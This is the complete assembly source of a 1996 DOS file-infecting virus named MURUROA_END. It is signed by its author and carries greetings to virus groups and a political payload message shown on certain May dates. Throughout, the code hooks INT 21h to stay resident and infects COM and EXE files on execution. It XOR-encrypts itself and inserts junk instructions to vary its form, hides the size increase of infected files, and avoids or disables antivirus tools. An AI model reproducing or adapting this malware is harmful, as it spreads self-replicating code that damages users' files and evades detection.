.286 ;******************************************************** ;* This source was created by Blesk/SVL in 23.03.1996 * ;******************************************************** ;* (C) Blesk/SVL 1996/97 * ;******************************************************** codes segment assume cs:codes, ds:codes, ss:codes org 100h startprog: virlength equ end_vir-begin mem_to_res equ 140h jmp svir ; Jump to VIRUS nop nop nop mov ah,4ch int 21h _virus: begin: ;============== UTIL TO restore infected program in memory ================== beg_c: call avg_fuck pop es push es mov ax,es add ax,10h add [cs:((offset eps) - begin)+si],ax add [cs:((offset ess) - begin)+si],ax cmp byte ptr [cs:((offset com_exe) - begin)+si],'c' jnz _exe_type mov ax,[cs:((offset orig_instr)-begin)+si] mov [cs:100h],ax mov ax,[cs:((offset orig_instr)-begin+2)+si] mov [cs:102h],ax mov [cs:((offset eps)-begin)+si],cs mov [cs:((offset epo)-begin)+si],100h mov [cs:((offset ess)-begin)+si],cs _exe_type: pop es push es push cs pop ds ;================ UTIL TO try if is virus now in memory ===================== mov ax,1996h int 21h cmp ax,9619h jz _instaled ;======================= UTIL TO get addr INT21h ============================ push bx push es mov ax,3521h int 21h mov word ptr [cs: (or_21-begin)+si],bx mov word ptr [cs: (or_21-begin)+2+si],es mov word ptr [cs: (org_21-begin)+si],bx mov word ptr [cs: (org_21-begin)+2+si],es pop es pop bx ;===================== UTIL TO GET MEM FOR VIRUS ============================ pop es push es push ds mov ax,es dec ax dec ax mov es,ax cmp byte ptr [es:10h],5ah jz no_end1 _end2: jmp _end1 no_end1: mov ax,[es:13h] sub ax,mem_to_res jc _end2 mov [es:13h],ax sub word ptr [es:22h],mem_to_res mov es,[es:22h] pop ds ;===================== UTIL TO move virus in MEMORY ========================= xor di,di cld push si mov cx,virlength repz movsb pop si ;======================= UTIL TO INITIALEZE VIRUS =========================== mov ax,2521h push es pop ds mov dx,(_int21-begin) int 21h ;=========== Pop and go to original ============ _instaled: _end1: pop es _p11: pop bp _p21: pop ds _p31: pop es _p41: pop dx _p51: pop cx _p61: pop bx _p71: pop ax pop si mov ss,[cs:((offset ess)-begin)+si] push [cs:((offset eps)-begin)+si] push [cs:((offset epo)-begin)+si] retf ;############################################################################ ;==================== Code to CALL and JMP to orig 21H ====================== dos: pushf db 9ah ; CALL xxxx:xxxx or_21: dd 0 ret To_21: db 0eah ; JMP xxxx:xxxx Org_21: dw 0,0 ;=============Cange DTA==================================== change_dta: pushf push ax push bx push cx push dx push es mov ah,2fh call dos mov dx,[es: word ptr bx+18h] and dh,0c0h cmp dh,0c0h jnz not_inf_dta; mov dx,[es: word ptr bx+18h] and dh,3fh mov [es: word ptr bx+18h],dx sub word ptr [es: word ptr bx+1ah],virlength sbb word ptr [es: word ptr bx+1ch],0 not_inf_dta: pop es pop dx pop cx pop bx pop ax popf ret ;=======find first via handle============= ffvh: popf call dos jc ffvh2 call change_dta ffvh2: retf 2 ;======find first/next via fcb============================= ffvfcb: popf call dos pushf cmp al,00 jnz no_found push ax push bx push cx push dx push es mov ah,2fh call dos mov al,[es: word ptr bx] cmp al,0ffh jnz @ew add bx,8 @ew: mov dx,[es: word ptr bx+18h] and dh,0c0h cmp dh,0c0h jnz not_inf_dta2; mov dx,[es: word ptr bx+18h] and dh,3fh mov [es: word ptr bx+18h],dx sub word ptr [es: word ptr bx+1ch],virlength sbb word ptr [es: word ptr bx+1eh],0 not_inf_dta2: pop es pop dx pop cx pop bx pop ax no_found: popf iret ;========================================================== Stupid_Tex_For_Now_: ; May be not 8))) db ' I am in LOVE now... ZUZANKA B.B. in Slovakia <:)<8< ' ;############################################################################ ; !!!!!!!!!!!!! here is my int 21h !!!!!!!!!!!!! ;############################################################################ ffvh3: jmp ffvh ffvfcb1: jmp ffvfcb _int21: pushf cmp ax,1996h jnz _next xchg ah,al popf sti iret _next: cmp ax,4b00h jnz _infe jmp _infect _infe: cmp ah,4eh jz ffvh3 cmp ah,4fh jz ffvh3 cmp ah,12h jz ffvfcb1 cmp ah,11h jz ffvfcb1 ;======================================================== _jmp_dos: popf jmp To_21 ;======================================================== ;############################################################################ include files.inc ;############################################################################ ;############################################################################ ;============= Util to add virus to open file ===================== add_to_file: call end_file push bp push es push ds push di push si push cs pop es push cs pop ds mov cx,[cs: word ptr (num_reloc-begin)] mov bx,(table_reloc-begin) R_continue: push cx push bx mov di,[cs: word ptr bx] mov dl,[cs: byte ptr bx+2] xor dh,dh zt4: call DEADCODE add di,2 dec dx jnz zt4 pop bx add bx,3 ;<= go to next position in TABLE pop cx dec cx jnz R_continue rtyt: call rnd_byte cmp al,0 jz rtyt mov [cs:byte ptr (_value-begin)],al mov di,(buff-begin) ; Move xor si,si xor dx,dx mov ax,(end_c-begin) ; Crypt mov bx,40h div bx mov cx,ax ; Count how much blocks ccykl: mov bx,40h mov di,(buff-begin) cccykl: mov al,[si] ; Crypt 1 40h block xor al,[cs:byte ptr (_value-begin)] mov [di],al ; inc si inc di dec bx jnz cccykl ; Loop to Crypt routine push cx push dx push si push di call end_file mov dx,(buff-begin) ; And Save that BLOCK mov cx,40h call write_file call end_file pop di pop si pop dx pop cx dec cx jnz ccykl ; Last COMPLET 40h block ; yes => Crypt last few cmp dx,0 jz _no_last_few push dx ; bytes (les than 40h) mov di,(buff-begin) cykl: mov al,[si] ; Crypt block xor al,[cs:byte ptr (_value-begin)] mov [di],al ; inc si inc di dec dx jnz cykl ; Loop to Crypt routine call end_file mov dx,(buff-begin) ; And Save last uncomplet pop cx ; BLOCK call write_file call end_file _no_last_few: mov cx,(buff-end_c) ; Copy decryptor push cs ; to buff push cs ; pop ds ; pop es ; mov di,(buff-begin) ; cld ; repz movsb ; call end_file mov cx,(buff-end_c) ; mov dx,(buff-begin) ; AND save it !!!! call write_file ; call end_file pop si pop di pop ds pop es pop bp ret ;===================================================================== ;############################################################################ ;############################################################################ ;############################################################################ ;================ Util to mark infected file via date ================ Mark_file: mov ax,5700h mov bx,[cs:( handle - begin )] call dos or dh,0c0h mov ax,5701h call dos ret ;===================================================================== ;############################################################################ ;############################################################################ ;############################################################################ ;===================== Data used by VIRUS ============================ EXE_HEADER: db 'MZ' ;header of exe file lastpage: dw ? ;Bytes in last page nopages: dw ? ;Count of pages RELOC: dw ? ;Count of relocate items HederSize: dw ? ;Heder size MinMem: dw ? MaxMem: dw ? ReloSS: dw ? ;Initial SS ReloSP: dw ? ;Initial SP CeckSum: dw ? ;DOS 3.00+ not use it !!!! StartIP: dw ? ;Starting IP StartCS: dw ? ;Starting CS OfsRelo: dw ? ;Relocation table's offset OVRType: dw ? ;0=Main segment nope : dw ? pklite: dw ? ;PKLITE = PK sign .. Don't ;INFECT !!!!! ;############################################################################ Old_21 : dd ? Time : dw ? date : dw ? Handle : dw ? virussize equ (offset end_vir)-(offset _virus) com_exe : dw 'c' ;############################################################################ _vypis: push ax push dx push cx push ds push cs pop ds mov ah,04 int 1ah cmp dh,05h ; Month = 5 ??? jnz not_vypis cmp dl,04h ; Day = 4 ??? jz y_vypis cmp dl,08h ; Day = 8 ??? jz y_vypis cmp dl,14h ; Day = 14 ??? jz y_vypis jmp not_vypis y_vypis: call beep mov dx,(text1-begin) mov ah,09h call dos call line ; 49 x Í mov dx,(text2-begin) mov ah,09h call dos call line ; 49 x Í mov dx,(text3-begin) mov ah,09h call dos call line ; 49 x Í mov dx,(text4-begin) mov ah,09h call dos call line ; 49 x Í mov dx,(text5-begin) mov ah,09h call dos mov ah,08 call dos call beep not_vypis: pop ds pop cx pop dx pop ax ret ;========================================================== line: mov cx,49 lllll: mov dl,'Í' mov ah,06h call dos loop lllll ret ;========================================================== beep : push ax mov ax,0e07h int 10h pop ax ret ;========================================================== ; 0cdh - line text1: db 13,10 db 0c9h,'$' text2: db 0bbh,13,10 db 0bah,' I have one mesage to all people on earth : ',0bah db 13,10 db 0cch,'$' text3: db 0b9h,13,10 db 0bah,' All French nuc. test`s was STOPED. But MURUROA ',0bah db 13,10 db 0bah,' IS DEAD !!!!! I am a coder of HELL FIRE and I ',0bah db 13,10 db 0bah,' BRING YOU >>>>>> FIRE <<<<<< By Blesk/SVL ',0bah db 13,10 db 0bah,'NOTE: Name of this virus is [MURUROA_END] ',0bah db 13,10 db 0bah,' By Blesk from Slovak Virus Laboratories at .SK ',0bah db 13,10 db 0bah,' Real name of BOZA is BIZATCH.. STUPID A-VERS !!!',0bah db 13,10 db 0bah,' PLUTONIUM IS BETTER IN POWER-PLANT !!!! ',0bah db 13,10 db 0bah,' My greet to: VYVOJAR,SVL,VLAD,SKIMS,40-hex,IR ',0bah db 13,10 db 0cch,'$' text4: db 0b9h,13,10 db 0bah,' And to some my friends: DJ.Milan,DJ.Maros, ',0bah db 13,10 db 0bah,' DJ.Babula(Baby),TINA-huhu,DURO,LACI,Duffy,Kaaa, ',0bah db 13,10 db 0bah,' Stano ...and more... A zdravim Mira Trnku 8)) ',0bah db 13,10 db 0c8h,'$' text5: db 0bch,13,10 db 13,10,'$' ;############################################################################ ;===================================================================== ;############################################################################ ;############################################################################ ;############################################################################ ;============== Utils to infect files !!!! =========================== _infect: push ax push bx push cx push es push dx push ds call _vypis call infect_files pop ds pop dx pop es pop cx pop bx pop ax jmp _jmp_dos ;===================================================================== ; ======================= INT_24.INC By Blesk/SVL ======================== int24: dw 0,0 ;============ Hook int 24h and store original vector ===================== Hook_24: push es push ax ; ================================================== xor ax,ax mov es,ax mov ax,[es: word ptr (24h*4)] mov [cs: word ptr (int24-begin)],ax mov ax,[es: word ptr (24h*4+2)] mov [cs: word ptr (int24-begin+2)],ax ; ======== Check INT 24 vector ===================== mov ax,(INT_24-begin) mov [es: word ptr (24h*4)],ax push cs pop ax mov [es: word ptr (24h*4+2)],ax ; ======== Set new INT 24 vector =================== pop ax pop es ret ;============ UnHook int 24h and restore original vector ================= UnHook_24: push es push ax ; ================================================== xor ax,ax mov es,ax mov ax,[cs: word ptr (int24-begin)] mov [es: word ptr (24h*4)],ax mov ax,[cs: word ptr (int24-begin+2)] mov [es: word ptr (24h*4+2)],ax ; ======== Restore INT 24 vector ===================== pop ax pop es ret ;==============================MY int 24h================================= INT_24: mov al,03 iret ;========================================================================= infect_files: call Hook_24 call findstr cmp byte ptr [cs:((offset nasiel_s)-begin)],0ffh jz can_infect jmp NoInfecting can_infect: call open_file mov cx,4h mov dx,((offset exe_header)-begin) call read_file cmp word ptr [cs:((offset exe_header)-begin)],5a4dh jnz com_infect call exe_infect jmp clo_infect com_infect: call infect_com clo_infect: call close_file NoInfecting: call UnHook_24 ret ;===================================================================== infect_com: call begin_file jnc cic2 jmp cic cic2: mov cx,4h mov dx,((offset exe_header)-begin) call read_file jc cic push cs pop ds mov ax,[ds:((offset exe_header)-begin)] mov [ds:((offset orig_instr)-begin)],ax mov ax,[ds:((offset exe_header)-begin+2)] mov [ds:((offset orig_instr)-begin+2)],ax call end_file add ax,virlength jc cant_infect_com sub ax,virlength mov bx,[cs:((offset handle)-begin)] mov cx,0ffffh mov dx,0fffeh mov ax,4202h call dos mov dx,((offset exe_header)-begin) mov cx,2 call read_file cmp word ptr [cs: ((offset exe_header)-begin)],1111h jz cant_infect_com call end_file push ax call begin_file pop ax sub ax,3 add ax,(svir-begin) mov [cs:((offset exe_header)-begin+1)],ax mov al,0E9h mov [cs:((offset exe_header)-begin)],al mov cx,3h mov dx,(offset exe_header)-begin mov byte ptr [cs:((offset com_exe)-begin)],'c' call write_file jc cic call end_file jc cic add ax,100h mov [cs: word ptr (delta-begin)],ax sub ax,100h call add_to_file call mark_file cic: cant_infect_com: ret ;========================================================== exe_infect: mov cx,0ffffh mov dx,0fffeh mov ax,4202h call dos mov cx,2 mov dx,(offset buff)-begin call read_file cmp word ptr [cs:((offset buff)-begin)],1111h jz cic call begin_file mov cx,20h mov dx,(offset exe_header)-begin call read_file cmp word ptr [cs:((offset ovrtype)-begin)],0000 jnz cic cmp word ptr [cs:((offset pklite)-begin)],'PK' jz cic mov bx,[cs:((offset reloSS)-begin)] mov [cs:((offset ess)-begin)],bx mov bx,[cs:((offset startIP)-begin)] mov [cs:((offset epo)-begin)],bx mov bx,[cs:((offset startCS)-begin)] mov [cs:((offset eps)-begin)],bx add word ptr [cs:((offset reloSS)-begin)],10h add word ptr [cs:((offset minmem)-begin)],100h add word ptr [cs:((offset maxmem)-begin)],100h jnc NoCaryMem mov word ptr [cs:((offset maxmem)-begin)],0ffffh NoCaryMem: mov byte ptr [cs:((offset com_exe)-begin)],'E' mov ax,virussize mov bx,200h xor dx,dx div bx add word ptr [cs:((offset nopages)-begin)],ax add dx,word ptr [cs:((offset lastpage)-begin)] xchg ax,dx xor dx,dx div bx mov word ptr [cs:((offset lastpage)-begin)],dx add word ptr [cs:((offset nopages)-begin)],ax call end_file push si push di mov di,dx mov si,ax mov ax,[cs:((offset hedersize)-begin)] mov bx,10h mul bx sub si,ax sbb di,dx mov dx,di mov ax,si pop di pop si mov bx,10h div bx mov [cs: word ptr (delta-begin)],dx add dx,(svir-begin) ; START at Svir mov [cs:((offset startIP)-begin)],dx mov [cs:((offset startCS)-begin)],ax call begin_file mov cx,1ch mov dx,((offset EXE_header)-begin) call write_file call end_file call add_to_file call Mark_file @44: ret ;========================================================== ;############################################################################ ;############################################################################ My_Favourite_paper_magazine: db ' I love PC Revue .... ' ;################################################################ ;################################################################ ;### Here is located RELOC table to put dumb instruction ### ;################################################################ ;################################################################ num_reloc: dw 38 table_reloc: dw dumb1-begin db 5 dw dumb2-begin db 23 dw dumb3-begin db 9 dw dumb4-begin db 3 dw dumb5-begin db 6 dw dumb6-begin db 16 dw dumb7-begin db 7 dw dumb8-begin db 3 dw dumb9-begin db 3 dw dumb10-begin db 9 dw dumb11-begin db 1 dw dumb12-begin db 3 dw dumb13-begin db 32 dw dumb14-begin db 4 dw dumb15-begin db 5 dw dumb16-begin db 5 dw dumb17-begin db 15 dw dumb18-begin db 8 dw dumb19-begin db 3 dw dumb20-begin db 4 dw dumb21-begin db 8 dw dumb22-begin db 6 dw dumb23-begin db 1 dw dumb24-begin db 1 dw dumb25-begin db 2 dw dumb26-begin db 13 dw dumb27-begin db 3 dw dumb28-begin db 3 dw dumb29-begin db 3 dw dumb30-begin db 3 dw dumb31-begin db 3 dw dumb32-begin db 3 dw dumb33-begin db 3 dw dumb34-begin db 3 dw dumb35-begin db 3 dw dumb36-begin db 3 dw dumb37-begin db 3 dw dumb38-begin db 3 ;################################################################ ;======================== FIND.INC Thanx to SVL ========================== analiza: ; ds:dx =>'c:\path\name.ext',0 push ax push si push dx push dx ; ds:dx = ds:si pop si analiza2: cmp byte ptr [si],'\' jz lomitko cmp byte ptr [si],0 jz end_name inc si jmp analiza2 lomitko: pop ax inc si push si jmp analiza2 end_name: pop dx pop si pop ax ; ds:dx =>'name.ext',0 ret ;----------------------------------------------------------------------------- ;Procedre FINDSTR check if string at adress DS:DX contain some1 word from ;table. ; Input: DS:DX-> string ; Output: NASIEL_S =0 Contain Nasiel_s = FFh Not contain FINDSTR1 proc near pusha jmp findstr2 FINDSTR : pusha mov byte ptr [cs:((offset nasiel_s)-begin)],0ffh call analiza push dx pop si mov di,(offset tab-begin) findstr2:mov bp,si compar0:mov cx,0 compar1:xor bx,bx compar2:mov ah,byte ptr cs:[di+bx] ;AH= char from table cmp ah,0 ; New word ???? jnz nextwor cmp cx,0 jnz found jz nextword nextwor: cmp ah,1 jz found_1 mov al,byte ptr ds:[si+bx] ;AL= char from checked string ; UpChar cmp al,5bh ;Make upcase of chars jns compar3 cmp al,41h js compar3 or al,20h compar3: cmp al,0 jnz next_w ;end of name ??? (try next) cmp cx,0 jnz found jnz nextword next_w: inc bx inc dx inc cx cmp al,ah jz compar2 nextword:mov ah,cs:[di] inc di cmp ah,1 ;If it is last word then mark NOT contain jz found_1 cmp ah,0 ;begin of new word ???? jnz nextword jmp compar0 ;Yes check it !!!!! found: mov byte ptr [cs:((offset nasiel_s)-begin)],0h found_1:popa ret FINDSTR1 endp nasiel_s:db 0 Exe db ".exe",0 Com db ".com",1 Tab db "avg",0 db "fv386",0 db "turbo",0 db "fv86",0 db "td",0 db "stacker",0 db "toolkit",0 db "msav",0 db "vc",0 db "rex",0 db "virlab",0 db "vir",0 db "alik",0 db "guard",0 db "nod",0 db "tbav",0 db "tbdriver",0 db "clean",0 db "f-pro",0 db "avast",0 db "asta",0 db "tbscan",0 db "debug",0 db "cpav",0 db "tlink",0 db "vlad",0 db "nav",0 db "vshie",0 db "dizz",0 db "command",0 db "hiew",0 db "sswap",0 db "scan",0 db "tbclean",0 db "vsafe",1 SpecForMT: db ' For M.T.: Vivat Ziar nad Hronom.. 8)) Uz si rad ?? ' db ' RADAR v PC Revue 9/94 ' ; Who is M.T. ??? It is Slovak A-Ver 8) and this was my MSG ; FOR him ;****************************************************************************** ; This procedure generates GARBAGE ( instructions which have no other purpose ; than to increase the variance of the code) ; G_TABLE.INC ==> table of destation adress and counts last: db 0 DEADCODE proc near push ds pusha push di push si push dx push dx pop si again: call RND_BYTE and al,00011111b cmp al,14 ; check range <0,13> jnc again ; Index in table2 cmp al,[cs: byte ptr (last-begin)] jz again mov [cs:byte ptr (last-begin)],al mov bx,table2-begin mov ah,0 add ax,ax push ax pop si add si,bx mov bx,[cs: word ptr si] mov [cs: word ptr di],bx D_CODE_END: pop bp pop si pop di popa pop ds ret ;----------------------------------------------------------- RND_BYTE proc near in al,40h ret rnd_byte endp table2 : db 088h,0ffh,089h,0c9h,088h,0c9h,021h,0d2h db 089h,0c0h,088h,0c0h,088h,0e4h,089h,0dbh,088h,0dbh db 088h,0edh,089h,0d2h,088h,0d2h,088h,0f6h,02ch,000h DEADCODE endp end_c: ;================================================================ ;################################################################ ;########Kill Heuristick in AVG (sometimes and in TBAV)########## old_20: dw 0,0 my_20: iret avg_fuck: dumb27: dw 3 dup(9090h) mov ax,3520h int 21h dumb28: dw 3 dup(9090h) mov word ptr [cs : (old_20 - begin)+si],bx dumb29: dw 3 dup(9090h) mov word ptr [cs : (old_20 - begin+2)+si],es dumb30: dw 3 dup(9090h) push cs pop ds dumb31: dw 3 dup(9090h) mov dx,my_20-begin add dx,si dumb32: dw 3 dup(9090h) mov ax,2510h dumb33: dw 3 dup(9090h) add ax,10h int 21h dumb34: dw 3 dup(9090h) int 20h mov dx, word ptr [cs: (old_20-begin)+si] dumb35: dw 3 dup(9090h) mov ds, word ptr [cs: (old_20-begin+2)+si] dumb36: dw 3 dup(9090h) mov ax,2520h dumb37: dw 3 dup(9090h) int 21h dumb38: dw 3 dup(9090h) ret ;############################################################################ ;############################################################################ ;==========================================================================; nop _protector: jmp _protect1 nop int_8: dw 0,0 _value: db 0 dec_8: ;================(destruct instrucition at JAMP:)========= mov ax,9090h mov word ptr [cs : ((offset jjjj)-begin) + si],ax decod1: db 0b9h dw end_c-beg_c push si mov dl,byte ptr [cs: (offset(_value)-offset(begin)) + si] cmp dl,0 jz decod7 decod4: xor [cs: byte ptr si+(beg_c-begin)],dl inc si decod6: db 49h jnz decod4 decod7: pop si mov al,20h out 20h,al iret ;========================================================================== _protect1: sti dumb2: dw 23 dup(9090h) mov ax,2h push ax dumb3: dw 9 dup(9090h) pop es mov bx,word ptr [es: 0] dumb4: dw 3 dup(9090h) mov ax,word ptr [es: 2] dumb5: dw 6 dup(9090h) mov [cs:((offset int_8)-begin)+si],bx dumb6: dw 16 dup(9090h) mov [cs:((offset int_8)-begin+2)+si],ax push cs dumb7: dw 7 dup(9090h) pop ds mov dx,((offset dec_8)-begin) add dx,si dumb8: dw 3 dup(9090h) mov ax,word ptr [cs : ((offset jjjj)-begin) + si] dumb9: dw 3 dup(9090h) mov word ptr [cs : ((offset backup)-begin) + si],ax cli dumb10: dw 9 dup(9090h) mov word ptr [es: 0],dx dumb11: dw 1 dup(9090h) mov word ptr [es: 2],ds dumb12: dw 3 dup(9090h) sti jamp: dumb13: dw 32 dup(9090h) jjjj: jmp jamp cli mov dx,[cs:((offset int_8)-begin)+si] dumb14: dw 4 dup(9090h) mov ax,[cs:((offset int_8)-begin+2)+si] dumb15: dw 5 dup(9090h) mov word ptr [es: 0],dx dumb16: dw 5 dup(9090h) mov word ptr [es: 2],ax sti dumb17: dw 15 dup(9090h) mov ax,word ptr [cs : ((offset backup)-begin) + si] dumb18: dw 8 dup(9090h) call dumb26 mov word ptr [cs : ((offset jjjj)-begin) + si],ax ret backup: dw 9090h ;############################################################################ ;############################################################################ ;############################################################################ ;############################################################################ ;############################################################################ ;############################################################################ svir: db 0beh ;Stands for MOV SI,xxxx delta dw offset begin ;We'll put the data offset in. push si dumb1: dw 5 dup(9090h) _p10: push ax call dumb26 pop ax call dumb25 push ax dumb19: dw 3 dup(9090h) call dumb25 _p20: push bx dumb20: dw 4 dup(9090h) call dumb25 _p30: push cx dumb21: dw 8 dup(9090h) call dumb26 _p40: push dx dumb22: dw 6 dup(9090h) call dumb26 _p50: push es dumb23: dw 1 dup(9090h) call dumb25 _p60: push ds call dumb26 dumb24: dw 1 dup(9090h) call dumb26 _p70: push bp call dumb26 push es push si pusha call avg_fuck popa pop si call _protector jmp beg_c dumb26: dw 13 dup(9090h) ret dumb25: dw 2 dup(9090h) jmp dumb26 dddddd: jmp dumb25 epo : dw ? eps : dw ? ess : dw ? orig_instr : db 90h,90h,90h,90h sign: dw 1111h end_vir: buff: codes ends end startprog ;######################################################################### ;## This source was generated by ## ;## Blesk's Funky Generator by Blesk/SVL ## ;######################################################################### ;## I used FOG - Funky Op code Generator ## ;## THANX ...... ## ;#########################################################################